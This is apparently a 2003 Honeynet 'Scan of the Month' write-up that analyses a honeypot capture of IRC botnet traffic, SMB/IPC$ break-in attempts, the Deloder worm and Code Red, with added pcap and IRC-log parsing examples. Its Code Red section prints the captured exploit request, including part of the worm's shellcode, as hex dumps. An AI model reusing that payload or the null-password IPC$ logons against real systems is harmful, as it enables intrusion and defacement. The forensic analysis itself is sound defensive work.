Scan of the Month 27
Nir Hauser
hauserns at georgetown dot edu
April 18, 2003
Tools:
Ethereal: http://www.ethereal.com/
Snort: http://www.snort.org/
A simple rules.txt file for Snort:
alert ip any any -> any any
output alert_fast: alert.fast
Running Snort against the binary log with this rule set (the log file given with -r, the rules with -c and a log directory with -l) produces a file alert.fast with a one-line summary of every packet. Snort also writes the decoded packets into one directory per IP address involved, with a separate file for each TCP or UDP session, which makes it easy to pull out a single conversation. Together with Ethereal this is a powerful way to work through the capture.
1. What is IRC?
Internet Relay Chat (IRC) is a text chat system in which many users join named chatrooms (channels) and talk to one another. It is built on a client/server architecture: IRC clients such as mIRC connect to an IRC server, usually one of a network of linked servers, which offers many channels to join. IRC also supports private messages, file transfer (DCC) and other operations.
2. What message is sent by an IRC client when it asks to join an IRC network?
First, the IRC client opens a TCP connection to port 6667 on the server by sending a packet with the SYN flag set; client and server then complete the usual three-way handshake. In Ethereal it looks like this:
From Ethereal:
35794 414909.249998 172.16.134.191 209.196.44.172 TCP 1152 > 6667 [SYN] Seq=4114925005 Ack=0 Win=16384
35795 414909.304675 209.196.44.172 172.16.134.191 TCP 6667 > 1152 [SYN, ACK] Seq=4266393801 Ack=4114925006 Win=32120
35796 414909.305433 172.16.134.191 209.196.44.172 TCP 1152 > 6667 [ACK] Seq=4114925006 Ack=4266393802 Win=17520
The IRC client then registers with the server by sending its nickname (NICK) and user information (USER). Here is what the honeypot sends to the IRC server 209.196.44.172:
NICK rgdiuggac
USER rgdiuggac localhost localhost :rgdiuggac
Once registered, the client asks to join a channel. Here is what the honeypot sends to 209.196.44.172:
JOIN #xŕéüîéđěx :sex0r
WHO rgdiuggac
Here the honeypot asks to join the channel #xŕéüîéđěx, supplying sex0r as the channel key (the trailing parameter of JOIN), and then issues a WHO query for its own nickname, rgdiuggac. A random-looking nickname like this is typical of a bot rather than a human user.
3. What is a botnet?
A botnet is a collection of compromised computers (zombies) that are all connected to the same IRC channel and controlled from it. First a Trojan horse is installed on each victim, by a worm, an exploit or a trojanized download. The Trojan then connects to a predetermined IRC server, joins the control channel and waits for commands posted there by the botnet's operator. A botnet can consist of thousands of zombie computers that sit idle until they are told to do something malicious.
4. What are botnets commonly used for?
Botnets of this kind are used for malicious purposes, and the owners of the zombie machines are generally unaware that their computers have joined one. The operator can command all of the zombies to begin a Distributed Denial of Service (DDoS) attack against a designated target. He can also order each member to scan and attack other computers, install the Trojan on them and so recruit them into the botnet, which is how the botnet grows.
5. What TCP ports does IRC generally use?
IRC servers generally listen on TCP ports in the range 6660 through 7000; 6667 is by far the most common. In this Scan, IRC always uses port 6667.
6. What is a binary log file and how is one created?
A binary log file is a raw packet capture in libpcap format: every frame the sniffer's network interface sees (in promiscuous mode, everything on the segment) is saved byte for byte with a timestamp, rather than decoded into text. It is created with a sniffer such as Snort, which writes one with its -b option (and reads it back with -r); tcpdump -w produces the same format. Snort can then decode the raw data and present it in human-readable form, and Ethereal can open the same file and show the packets in a GUI. Once the log is loaded into Ethereal or Snort, filters can be applied to extract specific packets or sessions.
7. What IRC servers did the honeypot, which has the IP address 172.16.134.191, communicate with?
The honeypot attempted to connect to the following IRC servers (a TCP SYN to port 6667 in each case):
66.33.65.58
63.241.174.144
217.199.175.10
209.126.161.29
209.196.44.172
as the following SYN packets show:
34821 412112.717027 172.16.134.191 209.126.161.29 TCP 1127 > 6667 [SYN] Seq=3377670478 Ack=0 Win=16384 Len=0
35739 412630.079021 172.16.134.191 66.33.65.58 TCP 1129 > 6667 [SYN] Seq=3523948626 Ack=0 Win=16384 Len=0
35745 413286.204510 172.16.134.191 63.241.174.144 TCP 1133 > 6667 [SYN] Seq=3688527302 Ack=0 Win=16384 Len=0
35762 413307.053048 172.16.134.191 217.199.175.10 TCP 1139 > 6667 [SYN] Seq=3694305514 Ack=0 Win=16384 Len=0
35794 414909.249998 172.16.134.191 209.196.44.172 TCP 1152 > 6667 [SYN] Seq=4114925005 Ack=0 Win=16384 Len=0
Only the connection to 209.196.44.172 was completed, and the honeypot logged on to that server.
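As an added example (not part of the original writeup), here is how questions 6 and 7 can be answered without Ethereal: a small parser for the libpcap binary log format, and two filters that list which servers a host tried to reach on an IRC port and which of them answered with a SYN/ACK. The capture it runs on is constructed inline to mirror the packets listed above (the SYN/ACK from 209.196.44.172 and a non-IRC SYN are included to show what gets filtered out); the MAC addresses and frame layout are assumptions, not the Scan's actual log.

```python
"""Read a libpcap (binary) log and list the IRC servers a host tried to reach.

Added example: a minimal pcap / Ethernet / IPv4 / TCP parser plus the two
filters needed for question 7. SAMPLE_PCAP is CONSTRUCTED inline to mirror
the packets quoted in the text; it is not the Scan's real log file.
"""
import socket
import struct

TCP_SYN, TCP_ACK = 0x02, 0x10
IRC_PORTS = range(6660, 7001)
# libpcap global header: magic, version 2.4, thiszone 0, sigfigs 0, snaplen, linktype 1 (Ethernet)
PCAP_GLOBAL_HDR = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)


def build_frame(src, dst, sport, dport, flags, seq=0):
    """Minimal Ethernet/IPv4/TCP frame for test data (checksums left at zero)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, flags, 16384, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0x4000, 64, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    eth = bytes.fromhex("0005690001e200e0b605ce0a0800")  # dst MAC, src MAC, ethertype IPv4 (assumed)
    return eth + ip + tcp


def build_pcap(records):
    """Serialize (timestamp_seconds, frame) pairs into a little-endian pcap file."""
    out = bytearray(PCAP_GLOBAL_HDR)
    for ts, frame in records:
        sec = int(ts)
        usec = int(round((ts - sec) * 1_000_000))
        out += struct.pack("<IIII", sec, usec, len(frame), len(frame)) + frame
    return bytes(out)


def iter_pcap(data):
    """Yield (timestamp, frame) for every record; both byte orders are accepted."""
    magic = struct.unpack("<I", data[:4])[0]
    if magic == 0xA1B2C3D4:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError("not a libpcap file (bad magic)")
    if struct.unpack(endian + "I", data[20:24])[0] != 1:
        raise ValueError("only Ethernet (linktype 1) is handled here")
    off = 24
    while off + 16 <= len(data):
        sec, usec, incl_len, _orig_len = struct.unpack(endian + "IIII", data[off:off + 16])
        off += 16
        yield sec + usec / 1_000_000, data[off:off + incl_len]
        off += incl_len


def parse_tcp(frame):
    """Return (src, dst, sport, dport, flags) for an IPv4/TCP frame, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":  # ethertype must be IPv4
        return None
    ihl = (frame[14] & 0x0F) * 4
    if frame[23] != 6:  # IP protocol 6 = TCP
        return None
    src, dst = socket.inet_ntoa(frame[26:30]), socket.inet_ntoa(frame[30:34])
    tcp = frame[14 + ihl:]
    if len(tcp) < 14:
        return None
    sport, dport = struct.unpack("!HH", tcp[:4])
    return src, dst, sport, dport, tcp[13]


def irc_connect_attempts(data, host, ports=IRC_PORTS):
    """SYN-only segments from host to an IRC port: every server it tried to log on to.
    Same as the Ethereal filter: ip.src==host && tcp.flags.syn==1 && tcp.flags.ack==0"""
    hits = []
    for ts, frame in iter_pcap(data):
        p = parse_tcp(frame)
        if p and p[0] == host and p[3] in ports and (p[4] & (TCP_SYN | TCP_ACK)) == TCP_SYN:
            hits.append((ts, p[1], p[3]))
    return hits


def irc_servers_answering(data, host, ports=IRC_PORTS):
    """Servers that sent host a SYN/ACK from an IRC port: the connections that opened."""
    answered = []
    for _ts, frame in iter_pcap(data):
        p = parse_tcp(frame)
        if (p and p[1] == host and p[2] in ports
                and (p[4] & (TCP_SYN | TCP_ACK)) == (TCP_SYN | TCP_ACK) and p[0] not in answered):
            answered.append(p[0])
    return answered


HONEYPOT = "172.16.134.191"
# Constructed capture: the five IRC SYNs quoted above, one SYN/ACK back, one non-IRC SYN.
SAMPLE_PCAP = build_pcap([
    (412112.717027, build_frame(HONEYPOT, "209.126.161.29", 1127, 6667, TCP_SYN)),
    (412630.079021, build_frame(HONEYPOT, "66.33.65.58", 1129, 6667, TCP_SYN)),
    (413286.204510, build_frame(HONEYPOT, "63.241.174.144", 1133, 6667, TCP_SYN)),
    (413307.053048, build_frame(HONEYPOT, "217.199.175.10", 1139, 6667, TCP_SYN)),
    (414909.249998, build_frame(HONEYPOT, "209.196.44.172", 1152, 6667, TCP_SYN)),
    (414909.304675, build_frame("209.196.44.172", HONEYPOT, 6667, 1152, TCP_SYN | TCP_ACK)),
    (418489.571532, build_frame(HONEYPOT, "199.107.7.2", 4828, 31337, TCP_SYN)),
])

if __name__ == "__main__":
    for ts, server, port in irc_connect_attempts(SAMPLE_PCAP, HONEYPOT):
        print(f"{ts:.6f}  {HONEYPOT} -> {server}:{port}  [SYN]")
    print("logged on to:", irc_servers_answering(SAMPLE_PCAP, HONEYPOT))
```

Point iter_pcap at the Scan's own log (read the file in binary mode) and the same two filters give the list above; the SYN-only test matters, because counting every segment to port 6667 would also pick up the retransmitted SYNs and the data of the one session that did open.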
8. During the observation period, how many distinct hosts accessed the botnet associated with the server having IP address 209.196.44.172?
During the observation period, 6639 distinct hosts accessed the botnet associated with the server 209.196.44.172. This includes the hosts that were already in the channel when the honeypot joined: when a client joins a channel, the server sends it the list of everyone currently in it (the RPL_NAMREPLY, numeric 353, messages), and I counted those names. I then went through all the IRC traffic from the server after that point and used a script to collect the nicknames of every other client that joined, spoke or left. Adding the two numbers gives 6639. The count is of nicknames, so a host that changed its nickname during the period would be counted more than once.
9. Assuming that each botnet host has a 56 kbps network link, what is the aggregate bandwidth of the botnet?
56 kbps x 6639 hosts = 371,784 kbps = 371.784 Mbps. This is an upper bound: it assumes every host is online at the same time and can saturate its link.
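The counting just described (the 353 names list received on join, plus every nickname that shows up in the channel afterwards) as an added example that is not part of the original writeup. It parses raw server-to-client IRC lines; the channel name, nicknames and server in the sample log are constructed, not the real ones, and NICK changes are folded back onto the original nickname so that one host is not counted twice. The last function computes the question 9 bandwidth figure.

```python
"""Count the distinct members of an IRC botnet channel from server-to-client traffic.

Added example of the counting method described for question 8: the NAMES
list the server sends on join (numeric 353) plus every nick that later
JOINs, talks or leaves, with NICK changes folded back onto the original
nick so one host is not counted twice. SAMPLE_LOG is CONSTRUCTED; the real
channel, nicks and server are not reproduced here.
"""


def split_params(rest):
    """IRC params are space separated; a leading ':' marks one trailing param that may hold spaces."""
    if rest.startswith(":"):
        return [rest[1:]]
    head, sep, trailing = rest.partition(" :")
    params = head.split()
    if sep:
        params.append(trailing)
    return params


def parse_line(line):
    """Return (prefix, COMMAND, params) for one raw IRC line."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    cmd, _, rest = line.partition(" ")
    return prefix, cmd.upper(), split_params(rest)


def nick_of(prefix):
    """':nick!user@host' names a client; a prefix without '!' is a server name."""
    if prefix and "!" in prefix:
        return prefix.split("!", 1)[0]
    return None


class BotnetRoster:
    def __init__(self, channel, own_nick):
        self.channel = channel.lower()
        self.own_nick = own_nick
        self.members = set()  # canonical nicks seen on the network with us
        self.alias = {}       # new nick -> canonical nick after a NICK change

    def canonical(self, nick):
        return self.alias.get(nick, nick)

    def feed(self, line):
        prefix, cmd, params = parse_line(line)
        if cmd == "353" and len(params) >= 4 and params[2].lower() == self.channel:
            # RPL_NAMREPLY: "<me> = #chan :nick @op +voiced ..." (a big channel spans several lines)
            for n in params[3].split():
                self.members.add(self.canonical(n.lstrip("@+%~&")))
        elif cmd == "NICK":
            old = nick_of(prefix)
            if old and params:
                canon = self.canonical(old)
                self.alias[params[0]] = canon
                self.members.add(canon)
        elif cmd in ("JOIN", "PART", "QUIT", "PRIVMSG", "NOTICE", "KICK", "MODE", "TOPIC"):
            # anything the server relays with a client prefix comes from a host that is on the network
            n = nick_of(prefix)
            if n:
                self.members.add(self.canonical(n))

    def distinct_hosts(self):
        """Everyone seen except the honeypot's own nick."""
        return len(self.members - {self.own_nick})


def aggregate_bandwidth_mbps(hosts, link_kbps=56):
    """Upper bound for question 9: every host online and saturating its link at once."""
    return hosts * link_kbps / 1000


# Constructed log: one names list split over two 353 lines, then later channel activity.
SAMPLE_LOG = [
    ":irc.example.net 001 rgdiuggac :Welcome to the network, rgdiuggac",
    ":irc.example.net 353 rgdiuggac = #chan :rgdiuggac @bossbot +abcdeffgh ghijklmnx",
    ":irc.example.net 353 rgdiuggac = #chan :qwertyuiop zxcvbnmas",
    ":irc.example.net 366 rgdiuggac #chan :End of /NAMES list.",
    "PING :irc.example.net",
    ":lkjhgfdsa!~x@10.0.0.7 JOIN :#chan",
    ":bossbot!ops@10.0.0.1 PRIVMSG #chan :!scan 199.107.7.2 31337",
    ":ghijklmnx!~x@10.0.0.8 NICK :mnbvcxzaq",
    ":mnbvcxzaq!~x@10.0.0.8 PRIVMSG #chan :done",
    ":qwertyuiop!~x@10.0.0.9 QUIT :Connection reset by peer",
]


def count_sample():
    roster = BotnetRoster("#chan", "rgdiuggac")
    for line in SAMPLE_LOG:
        roster.feed(line)
    return roster.distinct_hosts()


if __name__ == "__main__":
    n = count_sample()
    print(f"{n} distinct hosts, {aggregate_bandwidth_mbps(n):.3f} Mbps aggregate at 56 kbps each")
```

Feeding it the server side of the honeypot's IRC session (for example the Ethereal "Follow TCP Stream" output, server direction only) reproduces the question 8 count, with nickname changes no longer inflating it.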
1. What IP source addresses were used in attacking the honeypot?
The following IP addresses were used in attacking the honeypot:
12.252.61.161
12.253.142.87
12.83.147.97
129.116.182.239
141.149.155.249
141.85.37.78
144.134.109.25
148.235.82.146
162.33.189.252
164.125.76.48
168.226.98.61
168.243.103.205
169.254.205.177
172.16.134.191
192.130.71.66
192.215.160.106
194.199.201.9
195.36.247.77
195.67.251.197
200.135.228.10
200.50.124.2
200.60.202.74
200.66.98.107
200.74.26.73
200.78.103.67
202.63.162.34
203.106.55.12
203.115.96.146
203.170.177.8
204.50.186.37
205.180.159.35
206.149.148.192
207.6.77.235
208.186.61.2
209.45.125.110
209.45.125.69
210.111.56.66
210.12.211.121
210.203.189.77
210.214.49.227
210.22.204.101
210.58.0.25
211.149.57.197
212.110.30.110
212.122.20.74
212.162.165.18
212.243.23.179
213.107.105.72
213.116.166.126
213.122.77.74
213.170.56.83
213.217.55.243
213.23.49.158
213.44.104.92
213.7.60.57
213.84.75.42
216.170.214.226
216.192.145.21
216.228.8.158
216.229.73.11
217.1.35.169
217.222.201.82
217.227.245.101
217.227.98.82
217.35.65.9
218.163.9.89
218.237.70.119
218.244.66.32
218.25.147.83
218.4.48.74
218.4.65.115
218.4.87.137
218.4.99.237
218.87.178.167
218.92.13.142
219.118.31.42
219.145.211.132
219.145.211.3
219.65.37.37
219.94.46.57
24.107.117.237
24.161.196.103
24.167.221.106
24.197.194.106
24.74.199.104
4.33.244.44
4.64.221.42
61.11.11.54
61.111.101.78
61.132.88.50
61.132.88.90
61.134.45.19
61.14.66.92
61.140.149.137
61.150.120.72
61.150.72.7
61.155.126.150
61.177.154.228
61.177.56.98
61.177.62.66
61.185.212.166
61.185.215.42
61.185.242.190
61.185.29.9
61.203.104.148
61.55.71.169
61.8.1.64
62.127.38.198
62.150.170.134
62.150.170.232
62.194.4.114
62.201.96.159
62.251.129.118
64.17.250.240
64.254.203.68
66.139.10.15
66.190.67.122
66.233.4.225
66.73.160.240
66.8.163.125
66.81.131.17
66.92.135.108
67.201.75.38
67.81.161.166
68.115.33.110
68.152.53.138
68.154.11.82
68.169.174.108
68.37.54.69
68.45.123.130
68.84.210.227
80.181.116.202
81.114.77.37
81.202.125.5
81.50.177.167
81.57.217.208
2. What vulnerabilities did attackers attempt to exploit?
Windows uses Server Message Block (SMB) to let client applications read and write files on a server and request services from it. Before Windows 2000, SMB always ran on top of NetBIOS: the name service on UDP port 137, the datagram service on UDP 138 and the session service, which carries the actual SMB commands, on TCP 139. Windows 2000 can also accept SMB directly over TCP on port 445, with no NetBIOS layer. When a Windows 2000 client wants to talk SMB to another machine it tries both 139 and 445; if 445 answers it uses that port, otherwise it falls back to the NetBIOS session service on 139. This is useful to know, because an attacker who queries ports 137 and 139 but never tries 445 probably believes it is dealing with (or its tool was written for) a version of Windows older than Windows 2000.
Attackers attempted to connect to the honeypot through NetBIOS, which Windows machines use to find one another and share files and printers on a LAN, with the file and printer operations themselves carried as SMB commands. Many attackers began with a NetBIOS name service (NBNS) node status query to UDP port 137, which asks the target for its NetBIOS name table (the same query nbtstat -A sends). One such query looked like this:
1 0.000000 219.118.31.42 172.16.134.191 NBNS Name query NBSTAT *<00><00><00><00><00><00><00><00><00><00><00><00><00><00><00>
Some attackers attempted to map the honeypot's C drive over NetBIOS. A plain share named C is what older, share-level versions of Windows expose; Windows 2000 publishes the drive only as the administrative share C$, so none of these attempts succeeded. The request looked like this:
8 0.514274 219.118.31.42 172.16.134.191 SMB Tree Connect AndX Request, Path: \\PC0191\C
Some attackers attempted to connect to the honeypot's IPC$ share, which is also reached over SMB. IPC$ is the inter-process communication share: clients connect to it to open named pipes and issue Remote Procedure Calls (RPC), a client/server mechanism that lets a client invoke functions on the server through a programming interface, which is how users and shares are enumerated and services are controlled remotely. Because the Administrator password on the honeypot is NULL, an attacker can log in to it with full Administrator privileges. The request looks like this:
925 322205.478544 210.22.204.101 172.16.134.191 SMB Tree Connect AndX Request, Path: \\172.16.134.191\IPC$
61.111.101.78 attacks the honeypot with the W32.HLLW.Deloder worm. The worm connects to the honeypot's IPC$ share as described above and tries a list of common Administrator passwords, including the NULL password. Once it is in, it copies a Trojan backdoor, INST.EXE, onto the victim and also drops PSEXESVC.EXE, the service half of Sysinternals' legitimate PsExec remote-execution utility, which it uses to start its payload. We can see Deloder writing both files into the system directory in the following packets:
33280 412046.012158 61.111.101.78 172.16.134.191 SMB NT Create AndX Request, Path: \System32\PSEXESVC.EXE
33678 412072.276580 61.111.101.78 172.16.134.191 SMB NT Create AndX Request, Path: \System32\inst.exe
These two file names written over SMB right after an IPC$ logon are the signature of the Deloder worm.
Code Red is a self-propagating worm that exploits a buffer overflow in the Indexing Service ISAPI extension (idq.dll) of Microsoft IIS, reached through an HTTP request for a .ida file. First, 68.169.174.108 scanned the honeypot to see whether it runs IIS and is vulnerable to Code Red. The scanner is most likely eEye's Retina Code Red scanner, because that tool issues the following request to IIS:
GET /pagerror.gif HTTP/1.1\r\n
seen in this packet:
65 28542.955886 68.169.174.108 172.16.134.191 HTTP GET /pagerror.gif HTTP/1.1
218.25.147.83 later launches a Code Red attack against the IIS server on the honeypot. The request overflows the buffer with a long run of N characters and then uses %u-encoded bytes to redirect execution into the shellcode that follows the HTTP headers. Ethereal shows the exploit as one HTTP GET followed by three continuation segments:
<packet #1>
32885 396968.463209 218.25.147.83 172.16.134.191 HTTP GET
0000 00 05 69 00 01 e2 00 e0 b6 05 ce 0a 08 00 45 00  ..i...........E.
0010 05 d4 02 b0 40 00 6e 06 6d dc da 19 93 53 ac 10  ....@.n.m....S..
0020 86 bf 0e 32 00 50 94 47 ec 82 e7 ec 78 a8 50 18  ...2.P.G....x.P.
0030 44 10 75 2d 00 00 2f 64 65 66 61 75 6c 74 2e 69  D.u-../default.i
0040 64 61 3f 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e  da?NNNNNNNNNNNNN
0050 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e  NNNNNNNNNNNNNNNN
0060 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e  NNNNNNNNNNNNNNNN
0070 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e  NNNNNNNNNNNNNNNN
0080 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e  NNNNNNNNNNNNNNNN
0090 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e  NNNNNNNNNNNNNNNN
00a0 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e  NNNNNNNNNNNNNNNN
00b0 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e  NNNNNNNNNNNNNNNN
00c0 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e  NNNNNNNNNNNNNNNN
00d0 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e  NNNNNNNNNNNNNNNN
00e0 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e  NNNNNNNNNNNNNNNN
00f0 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e  NNNNNNNNNNNNNNNN
0100 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e  NNNNNNNNNNNNNNNN
0110 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e  NNNNNNNNNNNNNNNN
0120 4e 4e 4e 00 00 00 00 00 00 00 00 00 00 00 00 00  NNN.............
0130 00 00 c3 03 00 00 00 78 00 fa 20 20 48 54 54 50  .......x.. HTTP
0140 2f 31 2e 30 0d 0a 38 25 75 63 62 64 33 25 75 37  /1.0..8%ucbd3%u7
0150 38 30 31 25 75 39 30 39 30 25 75 36 38 35 38 25  801%u9090%u6858%
0160 75 63 62 64 33 25 75 37 38 30 31 25 75 39 30 39  ucbd3%u7801%u909
0170 30 25 75 39 30 39 30 25 75 38 31 39 30 25 75 30  0%u9090%u8190%u0
0180 30 63 33 25 75 30 30 30 33 25 75 38 62 30 30 25  0c3%u0003%u8b00%
0190 75 35 33 31 62 25 75 35 33 66 66 25 75 30 30 37  u531b%u53ff%u007
01a0 38 25 75 30 30 30 30 25 75 30 30 3d 61 20 20 48  8%u0000%u00=a H
01b0 54 54 50 2f 31 2e 30 0d 0a 43 6f 6e 74 65 6e 74  TTP/1.0..Content
01c0 2d 74 79 70 65 3a 20 74 65 78 74 2f 78 6d 6c 0a  -type: text/xml.
01d0 48 4f 53 54 3a 77 77 77 2e 77 6f 72 6d 2e 63 6f  HOST:www.worm.co
01e0 6d 0a 20 41 63 63 65 70 74 3a 20 2a 2f 2a 0a 43  m. Accept: */*.C
01f0 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 33  ontent-length: 3
0200 35 36 39 20 0d 0a 0d 0a 55 8b ec 81 ec 18 02 00  569 ....U.......
0210 00 53 56 57 8d bd e8 fd ff ff b9 86 00 00 00 b8  .SVW............
0220 cc cc cc cc f3 ab c7 85 70 fe ff ff 00 00 00 00  ........p.......
etc ...
<packet #2>
32886 396968.482227 218.25.147.83 172.16.134.191 HTTP Continuation
(hex is not important for this packet)
<packet #3>
32888 396969.003930 218.25.147.83 172.16.134.191 HTTP Continuation
0000 00 05 69 00 01 e2 00 e0 b6 05 ce 0a 08 00 45 00  ..i...........E.
0010 04 93 02 b5 40 00 6e 06 6f 18 da 19 93 53 ac 10  ....@.n.o....S..
0020 86 bf 0e 32 00 50 94 47 f7 da e7 ec 78 a8 50 18  ...2.P.G....x.P.
0030 44 10 de 1f 00 00 ff ff 8b 85 4c fe ff ff 83 c0  D.........L.....
0040 01 89 85 4c fe ff ff 8b 8d 64 fe ff ff 0f be 11  ...L.....d......
0050 85 d2 74 02 eb d3 8b f4 6a 00 8b 85 4c fe ff ff  ..t.....j...L...
0060 50 8b 4d 08 8b 51 64 52 8b 85 78 fe ff ff 50 ff  P.M..QdR..x...P.
0070 95 c0 fe ff ff 3b f4 90 43 4b 43 4b c7 85 4c fe  .....;..CKCK..L.
0080 ff ff 00 00 00 00 8b 8d 68 fe ff ff 83 c1 07 89  ........h.......
0090 8d 64 fe ff ff eb 1e 8b 95 64 fe ff ff 83 c2 01  .d.......d......
00a0 89 95 64 fe ff ff 8b 85 4c fe ff ff 83 c0 01 89  ..d.....L.......
00b0 85 4c fe ff ff 8b 8d 64 fe ff ff 0f be 11 85 d2  .L.....d........
00c0 74 02 eb d3 8b f4 6a 00 8b 85 4c fe ff ff 50 8b  t.....j...L...P.
00d0 8d 68 fe ff ff 83 c1 07 51 8b 95 78 fe ff ff 52  .h......Q..x...R
00e0 ff 95 c0 fe ff ff 3b f4 90 43 4b 43 4b 8b 45 08  ......;..CKCK.E.
00f0 8b 48 70 89 8d 4c fe ff ff 8b f4 6a 00 8b 95 4c  .Hp..L.....j...L
0100 fe ff ff 52 8b 45 08 8b 48 78 51 8b 95 78 fe ff  ...R.E..HxQ..x..
0110 ff 52 ff 95 c0 fe ff ff 3b f4 90 43 4b 43 4b c6  .R......;..CKCK.
0120 85 fc fe ff ff 00 8b f4 6a 00 68 00 01 00 00 8d  ........j.h.....
0130 85 fc fe ff ff 50 8b 8d 78 fe ff ff 51 ff 95 c4  .....P..x...Q...
0140 fe ff ff 3b f4 90 43 4b 43 4b 89 85 4c fe ff ff  ...;..CKCK..L...
0150 8b f4 8b 95 78 fe ff ff 52 ff 95 c8 fe ff ff 3b  ....x...R......;
0160 f4 90 43 4b 43 4b e9 0c fb ff ff eb fe e8 8c f5  ..CKCK..........
0170 ff ff eb 30 58 83 c0 05 55 57 53 56 50 6a 3c 8b  ...0X...UWSVPj<.
0180 f0 83 c6 0c 56 68 00 01 00 00 ff 70 08 ff 74 24  ....Vh.....p..t$
0190 28 ff 10 58 50 ff 74 24 18 ff 50 04 58 5e 5b 5f  (..XP.t$..P.X^[_
01a0 5d ff 20 90 e8 cb ff ff ff e8 7b f9 ff ff d0 f2  ]. .......{.....
01b0 27 6e f5 18 03 75 4b 3c 43 00 00 01 00 00 78 56  'n...uK<C.....xV
01c0 34 12 b8 78 56 34 12 58 50 8b bd 68 fe ff ff 89  4..xV4.XP..h....
01d0 47 f2 c3 8b 44 24 0c 05 b8 00 00 00 c7 00 4a ff  G...D$........J.
01e0 46 00 33 c0 c3 eb ec e8 f1 f4 ff ff 4c 6f 61 64  F.3.........Load
01f0 4c 69 62 72 61 72 79 41 00 47 65 74 53 79 73 74  LibraryA.GetSyst
0200 65 6d 54 69 6d 65 00 43 72 65 61 74 65 54 68 72  emTime.CreateThr
0210 65 61 64 00 43 72 65 61 74 65 46 69 6c 65 41 00  ead.CreateFileA.
0220 53 6c 65 65 70 00 47 65 74 53 79 73 74 65 6d 44  Sleep.GetSystemD
0230 65 66 61 75 6c 74 4c 61 6e 67 49 44 00 56 69 72  efaultLangID.Vir
0240 74 75 61 6c 50 72 6f 74 65 63 74 00 09 69 6e 66  tualProtect..inf
0250 6f 63 6f 6d 6d 2e 64 6c 6c 00 54 63 70 53 6f 63  ocomm.dll.TcpSoc
0260 6b 53 65 6e 64 00 09 57 53 32 5f 33 32 2e 64 6c  kSend..WS2_32.dl
0270 6c 00 73 6f 63 6b 65 74 00 63 6f 6e 6e 65 63 74  l.socket.connect
0280 00 73 65 6e 64 00 72 65 63 76 00 63 6c 6f 73 65  .send.recv.close
0290 73 6f 63 6b 65 74 00 09 77 33 73 76 63 2e 64 6c  socket..w3svc.dl
02a0 6c 00 00 47 45 54 20 00 3f 00 20 20 48 54 54 50  l..GET .?. HTTP
02b0 2f 31 2e 30 0d 0a 43 6f 6e 74 65 6e 74 2d 74 79  /1.0..Content-ty
02c0 70 65 3a 20 74 65 78 74 2f 78 6d 6c 0a 48 4f 53  pe: text/xml.HOS
02d0 54 3a 77 77 77 2e 77 6f 72 6d 2e 63 6f 6d 0a 20  T:www.worm.com.
02e0 41 63 63 65 70 74 3a 20 2a 2f 2a 0a 43 6f 6e 74  Accept: */*.Cont
02f0 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 33 35 36 39  ent-length: 3569
0300 20 0d 0a 0d 0a 00 63 3a 5c 6e 6f 74 77 6f 72 6d  .....c:\notworm
0310 00 4c 4d 54 48 0d 0a 3c 68 74 6d 6c 3e 3c 68 65  .LMTH..<html><he
0320 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71  ad><meta http-eq
0330 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70  uiv="Content-Typ
0340 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74  e" content="text
0350 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 65  /html; charset=e
0360 6e 67 6c 69 73 68 22 3e 3c 74 69 74 6c 65 3e 48  nglish"><title>H
0370 45 4c 4c 4f 21 3c 2f 74 69 74 6c 65 3e 3c 2f 68  ELLO!</title></h
0380 65 61 64 3e 3c 62 61 64 79 3e 3c 68 72 20 73 69  ead><bady><hr si
0390 7a 65 3d 35 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72  ze=5><font color
03a0 3d 22 72 65 64 22 3e 3c 70 20 61 6c 69 67 6e 3d  ="red"><p align=
03b0 22 63 65 6e 74 65 72 22 3e 57 65 6c 63 6f 6d 65  "center">Welcome
03c0 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77  to http://www.w
03d0 6f 72 6d 2e 63 6f 6d 20 21 3c 62 72 3e 3c 62 72  orm.com !<br><br
03e0 3e 48 61 63 6b 65 64 20 42 79 20 43 68 69 6e 65  >Hacked By Chine
03f0 73 65 21 3c 2f 66 6f 6e 74 3e 3c 2f 68 72 3e 3c  se!</font></hr><
0400 2f 62 61 64 79 3e 3c 2f 68 74 6d 6c 3e 20 20 20  /bady></html>
0410 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
0420 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
0430 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
